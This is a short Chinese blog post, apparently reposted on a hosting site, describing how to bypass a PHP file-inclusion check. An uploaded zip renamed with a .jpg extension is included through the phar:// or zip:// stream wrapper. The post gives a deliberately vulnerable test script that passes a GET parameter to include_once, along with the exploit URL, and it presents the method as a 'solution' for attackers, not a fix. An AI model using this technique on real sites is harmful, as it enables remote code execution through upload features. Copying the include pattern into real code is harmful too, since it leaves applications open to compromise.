包含漏洞   文件类型白名单验证及判断后缀的解决办法

发布时间:2020-07-10 09:58:56 作者:serverxx0
来源:网络 阅读:3383

$include_file 可控,可以上传文件, 上传后缀限制为jpg,gif,png,包含后缀限制必须为.php

allow_url_include=Off (不考虑远程包含)

if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" )
        {
                include_once( $include_file );
        }


-----------------------------------------------------

解决方案

要求php>=5.3


把php打包成zip,改名上传,比如名为info.zip.jpg
然后用phar流包装器包含,其中info.zip.jpg为zip文件名,info.php为zip压缩包内子文件名

http://localhost/index.php?a=phar://info.zip.jpg/info.php


测试代码:

echo "ini_get(allow_url_include):".ini_get("allow_url_include")."";
$include_file=$_GET['a'];
if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" )
{
    include_once( $include_file );
}
else
{
    echo "file err";
}

包含漏洞   文件类型白名单验证及判断后缀的解决办法

参考文档:http://php.net/manual/zh/phar.using.stream.php

PS.
据php官方文档所述,最少需要php5.3才能使用,5.3之前需要拓展
如果不能用的话,还可以试试zip流包装器(需要zip拓展),注意转义井号:

zip://info.zip.jpg#info.php


推荐阅读:
  1. linux环境安装python3的环境(包含setuptoo
  2. WebLogic EJBTaglibDescriptor XXE漏洞(CVE-2019-2888)分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

上传文件 包含漏洞 名单

上一篇:C#常用特性有哪些

下一篇:如何解析Java volatile关键字的代码

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》